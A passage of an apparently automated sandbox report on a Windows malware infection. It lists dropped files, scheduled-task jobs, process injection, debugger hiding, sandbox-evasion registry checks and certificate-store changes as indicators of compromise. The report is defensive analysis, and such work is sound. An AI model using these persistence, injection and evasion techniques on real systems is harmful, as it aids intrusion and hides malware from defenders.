C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\ArGDBXWmyYtLacf svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 PovXUCA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 PovXUCA.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DB145CFEEC544B1582FED1ADA3370DD svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies PovXUCA.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol wjichPy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft PovXUCA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DB145CFEEC544B1582FED1ADA3370DD svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent D03D1E35412D4BF5 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache PovXUCA.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
Processes:
5875517.scr3040445.scr9k747JMG7jwW9QQSPMvI1cd9.exeqMwqayby3LtBSXcMFZn4WENT.exeQXHofo5pEteva5oWRgeBqUVV.exepDOVOMsZF5WLWhICeZK_Vlir.exeI3gaVL3bm1lMtsvde3S141IC.exewwl.exe8043795.exe4203002.exe7963793.scr7048378.scr6419.exeBC4C.exewwi.exeD9E4.exeEACD.exeA8C5.exepid process 1748 5875517.scr 4748 3040445.scr 5632 9k747JMG7jwW9QQSPMvI1cd9.exe 5624 qMwqayby3LtBSXcMFZn4WENT.exe 976 QXHofo5pEteva5oWRgeBqUVV.exe 1124 pDOVOMsZF5WLWhICeZK_Vlir.exe 6832 I3gaVL3bm1lMtsvde3S141IC.exe 5356 wwl.exe 6292 8043795.exe 7380 4203002.exe 3628 7963793.scr 3796 7048378.scr 7536 6419.exe 4460 BC4C.exe 6120 wwi.exe 8044 D9E4.exe 10020 EACD.exe 7500 A8C5.exe -
Suspicious use of SetThreadContext 21 IoCs
Processes:
Sat2026ef0d60b87a3f5.exe5125044.scrsvchost.exe4x4_z5aLp04hx89ID2XGg6um.exe8043795.exe5958877.exeforfiles.exetmpB21F_tmp.exeDCC6.exeDCC6.exeservices64.exebuild2.exesc.exe4769.exeushtnjuk.exejftucsuDCC6.exeDCC6.exejftucsuDCC6.exedescription pid process target process PID 3860 set thread context of 5080 3860 Sat2026ef0d60b87a3f5.exe Sat2026ef0d60b87a3f5.exe PID 2468 set thread context of 3844 2468 5125044.scr 5125044.scr PID 2808 set thread context of 4860 2808 svchost.exe svchost.exe PID 1640 set thread context of 2196 1640 tmpE781_tmp.exe PID 648 set thread context of 6940 648 4x4_z5aLp04hx89ID2XGg6um.exe 4x4_z5aLp04hx89ID2XGg6um.exe PID 6292 set thread context of 6404 6292 8043795.exe ALU9NmuUdiXkXK7aVOwsE9z7.exe PID 7132 set thread context of 7388 7132 5958877.exe 5958877.exe PID 7280 set thread context of 4440 7280 forfiles.exe explorer.exe PID 4852 set thread context of 7348 4852 tmpB21F_tmp.exe tmpB21F_tmp.exe PID 6104 set thread context of 7532 6104 DCC6.exe DCC6.exe PID 8856 set thread context of 8028 8856 DCC6.exe DCC6.exe PID 6604 set thread context of 10056 6604 services64.exe explorer.exe PID 9300 set thread context of 9448 9300 build2.exe build2.exe PID 10228 set thread context of 7452 10228 sc.exe 3CD9.exe PID 9352 set thread context of 8732 9352 4769.exe WMIC.exe PID 9168 set thread context of 9920 9168 ushtnjuk.exe svchost.exe PID 1016 set thread context of 9532 1016 jftucsu jftucsu PID 9024 set thread context of 9456 9024 DCC6.exe DCC6.exe PID 3592 set thread context of 1752 3592 DCC6.exe DCC6.exe PID 3084 set thread context of 10080 3084 jftucsu jftucsu PID 3600 set thread context of 8988 3600 DCC6.exe DCC6.exe -
Drops file in Program Files directory 39 IoCs
Processes:
ultramediaburner.tmpGM2TDOTFhN_nbC2OoeD2Rg86.exemd8_8eus.exePovXUCA.exehJfXrqQQ_Fe0h5fLGBSbNOgz.exesetup_2.tmpZe2ro.exedescription ioc process File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe GM2TDOTFhN_nbC2OoeD2Rg86.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi PovXUCA.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PovXUCA.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe hJfXrqQQ_Fe0h5fLGBSbNOgz.exe File created C:\Program Files (x86)\FarLabUninstaller\is-CA3EC.tmp setup_2.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe GM2TDOTFhN_nbC2OoeD2Rg86.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\STjmdXhOU\dxARth.dll PovXUCA.exe File created C:\Program Files (x86)\NMbcPgNClKinC\awJHiwg.xml PovXUCA.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe hJfXrqQQ_Fe0h5fLGBSbNOgz.exe File created C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe.config Ze2ro.exe File created C:\Program Files (x86)\UltraMediaBurner\is-SV5SJ.tmp ultramediaburner.tmp File created C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe Ze2ro.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-OPB9H.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File created C:\Program Files (x86)\gaSWcYIjjvwU2\MdHxiAMRPtfhv.dll PovXUCA.exe File created C:\Program Files (x86)\YceypsUXabDXnCzNCPR\aMiDGyU.dll PovXUCA.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini hJfXrqQQ_Fe0h5fLGBSbNOgz.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi PovXUCA.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe hJfXrqQQ_Fe0h5fLGBSbNOgz.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe hJfXrqQQ_Fe0h5fLGBSbNOgz.exe File created C:\Program Files (x86)\Microsoft.NET\Welaehywola.exe Ze2ro.exe File created C:\Program Files (x86)\Microsoft.NET\Welaehywola.exe.config Ze2ro.exe File created C:\Program Files (x86)\YceypsUXabDXnCzNCPR\hqHhhng.xml PovXUCA.exe File created C:\Program Files (x86)\gaSWcYIjjvwU2\sCjgdHE.xml PovXUCA.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja PovXUCA.exe File created C:\Program Files (x86)\STjmdXhOU\MyZHJOT.xml PovXUCA.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak PovXUCA.exe File created C:\Program Files (x86)\NMbcPgNClKinC\WMgXAtj.dll PovXUCA.exe File created C:\Program Files (x86)\ZHcfdgyasGUn\zTIJojK.dll PovXUCA.exe -
Drops file in Windows directory 22 IoCs
Processes:
MicrosoftEdgeCP.exesvchost.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeschtasks.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeschtasks.exeschtasks.exeExplorer.EXEMicrosoftEdge.exeschtasks.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Tasks\xsEpqqHAgqAwsAroz.job svchost.exe File opened for modification C:\Windows\Tasks\ArGDBXWmyYtLacf.job svchost.exe File opened for modification C:\Windows\Tasks\nMmJzTJTMvgDqJXEl.job svchost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\ArGDBXWmyYtLacf.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Tasks\bRciptYQhTCMvEFWGJ.job svchost.exe File created C:\Windows\Tasks\xsEpqqHAgqAwsAroz.job schtasks.exe File created C:\Windows\Tasks\nMmJzTJTMvgDqJXEl.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri Explorer.EXE File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\Tasks\bRciptYQhTCMvEFWGJ.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1848 4640 WerFault.exe Sat20545a92617f.exe 5196 4640 WerFault.exe Sat20545a92617f.exe 1404 2468 WerFault.exe 5125044.scr 5548 4820 WerFault.exe Sat200240b71b.exe 4256 4640 WerFault.exe Sat20545a92617f.exe 5604 4204 WerFault.exe setup.exe 6308 4640 WerFault.exe Sat20545a92617f.exe 6420 4204 WerFault.exe setup.exe 7060 4204 WerFault.exe setup.exe 7136 5748 WerFault.exe wOurEP1Lg22ZZexSGLrzgNTx.exe 6888 4204 WerFault.exe setup.exe 3388 4204 WerFault.exe setup.exe 6088 4204 WerFault.exe setup.exe 7220 4640 WerFault.exe Sat20545a92617f.exe 7644 7132 WerFault.exe 5958877.exe 8084 4640 WerFault.exe Sat20545a92617f.exe 7264 4640 WerFault.exe Sat20545a92617f.exe 6212 5748 WerFault.exe wOurEP1Lg22ZZexSGLrzgNTx.exe 8020 5748 WerFault.exe wOurEP1Lg22ZZexSGLrzgNTx.exe 7892 5608 WerFault.exe Yry2f6UscYEHvhxNM_NasvjF.exe -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
ustucsuustucsuALU9NmuUdiXkXK7aVOwsE9z7.exe3CD9.execompattelrunner.execyhXA10eOOPKGx2fm1TIDtyP.exeSat20de8d8504.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ustucsu Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ustucsu Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ustucsu Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ustucsu Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ALU9NmuUdiXkXK7aVOwsE9z7.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3CD9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI compattelrunner.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ustucsu Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cyhXA10eOOPKGx2fm1TIDtyP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cyhXA10eOOPKGx2fm1TIDtyP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ustucsu Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sat20de8d8504.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sat20de8d8504.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sat20de8d8504.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ALU9NmuUdiXkXK7aVOwsE9z7.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ALU9NmuUdiXkXK7aVOwsE9z7.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI compattelrunner.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cyhXA10eOOPKGx2fm1TIDtyP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3CD9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3CD9.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI compattelrunner.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build2.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5148 schtasks.exe 4968 schtasks.exe 10108 schtasks.exe 9308 schtasks.exe 8528 schtasks.exe 8424 schtasks.exe 9348 schtasks.exe 5156 schtasks.exe 7844 schtasks.exe 3852 schtasks.exe 8164 schtasks.exe 3772 schtasks.exe 8984 schtasks.exe 5776 schtasks.exe 3988 schtasks.exe 6724 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 6212 timeout.exe 9936 timeout.exe 10020 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5416 taskkill.exe 5276 taskkill.exe 5272 taskkill.exe 5052 taskkill.exe -
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeOneDriveSetup.exebrowser_broker.exebrowser_broker.exebrowser_broker.exezxzLMwG.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch zxzLMwG.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" zxzLMwG.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exegWaq3hqPJ5rZctwz9iAX7kUB.exesvchost.exepowershell.exerundll32.exepowershell.exepowershell.exeLzmwAqmV.exesvchost.exepowershell.exewjichPy.exepowershell.exePovXUCA.exepowershell.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root LzmwAqmV.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 008db73d89f3540424edb47d450dd49d084297dce82e72baa46d34fdc48d541d8006941f80cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d8834a743ee0ac644490bdb57e23e9975e02cbf6ba54758df21d5904fca66c13de80497139ed9d084295d9e13f4bb4c06d02fdadfd5425d29d470d32f5a06f249ec60b1b79bdf0012dd98cb57920ee9c5a03cdf28d387287cc186270a4f93824dc814d713ae3ac5519cdbd svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA gWaq3hqPJ5rZctwz9iAX7kUB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" wjichPy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" PovXUCA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer PovXUCA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" LzmwAqmV.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 008db73dc9f6540424edb47d450dd49d084297dce82e72baa46d34fdc48d541dc1b00f3480cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d8834a743ee0ac644490bdb57e23e9975e02cbf6ba54758df21d5904fca66c13de80497139ed9d084295d9e13f4bb4c06d02fdadfd5425d29d470d32f5a06f249ec60b1b79bdf0012dd98cb57e23ef955e0ccdfc8d387287cc186270a4f93824dc814d713ae3ad5019c1bd svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" gWaq3hqPJ5rZctwz9iAX7kUB.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 008db73dec8d540424edb47d450dd49d084297dce82e72baa46d34fdc48d541d7fc847678bcd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d8834a743ee0ac644490bdb57e23e9975e02cbf6ba54758df21d5904fca66c13de80497139ed9d084295d9e13f4bb4c06d02fdadfd5425d29d470d32f5a06f249ec60b1b79bdf0012dd98abc7b26ec9c5f03ccc4e13b7e85c12b496da0f15d15d88448733ae5aa511ff4d3e1394ba9dd1d51fdf7bc54 svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" LzmwAqmV.exe Set value (str) 